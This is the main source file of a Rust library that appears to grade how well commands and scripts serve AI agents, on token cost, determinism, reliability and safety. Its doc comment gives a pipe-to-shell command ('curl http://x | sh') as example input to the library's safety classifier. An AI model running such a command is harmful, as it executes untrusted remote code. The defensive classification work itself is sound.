Skip to main content

agentic_eval/
lib.rs

1//! # agentic-eval
2//!
3//! A standalone library for evaluating how well a *program* (a command, script,
4//! snippet, or any text an LLM writes or reads) serves an **agentic AI system**,
5//! across four axes that determine real agent cost and trust:
6//!
7//! - [`tokens`] — **token efficiency**: the four cost terms an agent pays
8//!   (standing context, input, output, retries), counted under popular tokenizers
9//!   (OpenAI GPT-4 `cl100k`, GPT-4o `o200k`, and a documented Anthropic-Claude
10//!   approximation), with program-vs-program comparison amortized over a session.
11//! - [`determinism`] — **determinism**: whether a program's output is byte-stable
12//!   across repeated runs (so an agent can parse/cache/diff it reliably).
13//! - [`reliability`] — **reliability**: the success rate over representative
14//!   invocations and whether failures are *structured/actionable* (so an agent can
15//!   self-correct instead of guessing).
16//! - [`safety`] — **safety**: given the effects a program performs, how much of its
17//!   blast radius is gated (approval/denied) vs. allowed under an agent policy.
18//!
19//! For real shell commands, [`commands`] ships a curated heuristic classifier
20//! (`rm` → destructive, `curl` → network, `sudo` → privileged, …) so the safety axis
21//! works on a wide variety of CLI programs without a hand-written effect map —
22//! `assess_safety_script("curl http://x | sh", Mode::Agent)` in one call.
23//!
24//! The library is **agentic-first** in its own design: it is execution-agnostic and
25//! deterministic (pure functions, no I/O, no `unsafe`), structured (typed reports
26//! with optional `serde`), and — via [`ontology`] — *self-describing*. A consumer
27//! discovers the whole surface (axes, effect taxonomy with per-mode decisions,
28//! models, command classes) from a compact [`ontology::manifest`] and expands any
29//! entry with [`ontology::describe`], the same progressive-disclosure pattern the
30//! crate measures — so an agent can use it without reading these docs.
31//!
32//! The library is execution-agnostic: it can't run arbitrary languages, so the
33//! axes that need behavior (determinism, reliability) take a caller-provided
34//! closure, and safety takes the program's declared [`safety::Effect`]s. Token
35//! efficiency works directly on text. Everything is dependency-light (a labeled
36//! heuristic tokenizer by default; enable `--features real-tokens` for exact
37//! OpenAI BPE counts via `tiktoken-rs`).
38//!
39//! Beyond per-program axes, the crate ships curated agentic profiles of whole
40//! *subjects* an agent must live with — programming [`languages`], AI
41//! [`frameworks`], VM/sandbox [`vms`] systems (scored on agent-native axes:
42//! start-latency, density, isolation, snapshotting, agent-control), and
43//! [`web`] stacks / wire protocols (scored on streaming, tool-discoverability,
44//! encoding-efficiency, interop, security-primitives). Each is a deterministic,
45//! comparable 0.0–1.0 judgment with evidence (`rank_vms()`,
46//! `rank_web_stacks()`, `compare_vms(a, b)`, …).
47//!
48//! ```
49//! use agentic_eval::tokens::{Model, Program};
50//! let legible = Program::new("ls", "file.read(\"README.md\")");
51//! let cipher = Program::new("ls", "F.r\"README.md\"");
52//! let cmp = agentic_eval::tokens::compare(&legible, &cipher, Model::OpenAiGpt4, 30);
53//! // Over a session the more-legible form is usually competitive or cheaper once
54//! // standing context is counted; `cmp` reports the winner and the ratio.
55//! let _ = cmp.winner_is_a;
56//! ```
57
58#![forbid(unsafe_code)]
59#![deny(missing_docs)]
60
61pub mod commands;
62pub mod determinism;
63pub mod frameworks;
64pub mod languages;
65pub mod ontology;
66pub mod reliability;
67pub mod safety;
68pub mod tokens;
69pub mod vms;
70pub mod web;
71
72// Ergonomic re-exports of the most-used types, so callers can write
73// `agentic_eval::Model` instead of `agentic_eval::tokens::Model`, etc.
74pub use commands::{assess_safety_script, classify_command, classify_invocation, classify_script};
75pub use determinism::{assess_determinism, DeterminismReport};
76pub use frameworks::{
77    compare_frameworks, rank_frameworks, Framework, FrameworkComparison, FrameworkProfile,
78};
79pub use languages::{
80    compare_languages, rank_languages, Language, LanguageComparison, LanguageProfile,
81};
82pub use ontology::{ontology, Ontology};
83pub use reliability::{
84    assess_error_quality, assess_reliability, ErrorQuality, ErrorQualityReport, Outcome,
85    ReliabilityReport,
86};
87pub use safety::{
88    assess_exfiltration, assess_reversibility, assess_safety, assess_safety_named, Decision,
89    Effect, ExfiltrationReport, Mode, ReversibilityReport, SafetyReport,
90};
91pub use tokens::{
92    assess_cache, assess_scaling, cacheable_prefix_tokens, compare, evaluate, evaluate_with, rank,
93    rank_with, AgentCost, CacheReport, Comparison, Model, Program, ScalingReport,
94};
95pub use vms::{compare_vms, rank_vms, Vm, VmComparison, VmProfile};
96pub use web::{compare_web_stacks, rank_web_stacks, WebStack, WebStackComparison, WebStackProfile};
97
98/// A combined, all-axes evaluation of a single program. Construct with
99/// [`Evaluation::new`] then fill in whichever axes you can measure (directly or via
100/// the `with_*` builders); unset axes stay `None`. A convenience for reporting a
101/// program's overall agentic fitness.
102#[cfg_attr(feature = "serde", derive(serde::Serialize))]
103#[derive(Debug, Clone, Default)]
104pub struct Evaluation {
105    /// Identifier for the evaluated program.
106    pub name: String,
107    /// Token-efficiency cost, if measured.
108    pub tokens: Option<tokens::AgentCost>,
109    /// Determinism result, if measured.
110    pub determinism: Option<determinism::DeterminismReport>,
111    /// Reliability result, if measured.
112    pub reliability: Option<reliability::ReliabilityReport>,
113    /// Safety result, if measured.
114    pub safety: Option<safety::SafetyReport>,
115}
116
117impl Evaluation {
118    /// A new, empty evaluation named `name`; fill axes via the `with_*` builders.
119    pub fn new(name: impl Into<String>) -> Self {
120        Self {
121            name: name.into(),
122            ..Default::default()
123        }
124    }
125
126    /// Builder: attach the token-cost axis.
127    pub fn with_tokens(mut self, c: tokens::AgentCost) -> Self {
128        self.tokens = Some(c);
129        self
130    }
131    /// Builder: attach the determinism axis.
132    pub fn with_determinism(mut self, d: determinism::DeterminismReport) -> Self {
133        self.determinism = Some(d);
134        self
135    }
136    /// Builder: attach the reliability axis.
137    pub fn with_reliability(mut self, r: reliability::ReliabilityReport) -> Self {
138        self.reliability = Some(r);
139        self
140    }
141    /// Builder: attach the safety axis.
142    pub fn with_safety(mut self, s: safety::SafetyReport) -> Self {
143        self.safety = Some(s);
144        self
145    }
146
147    /// A coarse 0.0–1.0 "agentic fitness" score: the mean of the per-axis scores
148    /// that were measured (token efficiency is excluded — it is comparative, not
149    /// absolute). Returns `None` if no scorable axis was measured.
150    pub fn fitness(&self) -> Option<f64> {
151        let mut sum = 0.0;
152        let mut n = 0.0;
153        if let Some(d) = &self.determinism {
154            sum += if d.deterministic { 1.0 } else { 0.0 };
155            n += 1.0;
156        }
157        if let Some(r) = &self.reliability {
158            sum += (r.pass_rate + r.actionable_rate) / 2.0;
159            n += 1.0;
160        }
161        if let Some(s) = &self.safety {
162            sum += s.score;
163            n += 1.0;
164        }
165        if n == 0.0 {
166            None
167        } else {
168            Some(sum / n)
169        }
170    }
171}
172
173impl std::fmt::Display for Evaluation {
174    /// A compact multi-line report of every measured axis plus the fitness score.
175    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
176        writeln!(f, "evaluation: {}", self.name)?;
177        if let Some(t) = &self.tokens {
178            writeln!(f, "  tokens:       {}", t)?;
179        }
180        if let Some(d) = &self.determinism {
181            writeln!(f, "  determinism:  {}", d)?;
182        }
183        if let Some(r) = &self.reliability {
184            writeln!(f, "  reliability:  {}", r)?;
185        }
186        if let Some(s) = &self.safety {
187            writeln!(f, "  safety:       {}", s)?;
188        }
189        match self.fitness() {
190            Some(score) => write!(f, "  fitness:      {:.2}", score),
191            None => write!(f, "  fitness:      n/a (no scorable axis measured)"),
192        }
193    }
194}
195
#[cfg(all(test, feature = "serde"))]
mod serde_tests {
    use super::*;

    /// Compile-time check helper: a call `assert_serialize::<T>()` only
    /// type-checks when `T: serde::Serialize`. The body is a no-op; the trait
    /// bound is the assertion.
    fn assert_serialize<T: serde::Serialize>() {}

    /// With the `serde` feature enabled, each report/config type listed here must
    /// implement `Serialize` (so machine-readable output is available). A missing
    /// derive fails the build of this test rather than failing at run time. Types
    /// not listed are not covered by this check.
    #[test]
    fn report_types_implement_serialize() {
        // Combined report.
        assert_serialize::<Evaluation>();
        // Token axis.
        assert_serialize::<AgentCost>();
        assert_serialize::<Program>();
        assert_serialize::<Comparison>();
        assert_serialize::<Model>();
        // Determinism axis.
        assert_serialize::<DeterminismReport>();
        // Reliability axis.
        assert_serialize::<Outcome>();
        assert_serialize::<ReliabilityReport>();
        // Safety axis.
        assert_serialize::<Effect>();
        assert_serialize::<Mode>();
        assert_serialize::<Decision>();
        assert_serialize::<SafetyReport>();
    }
}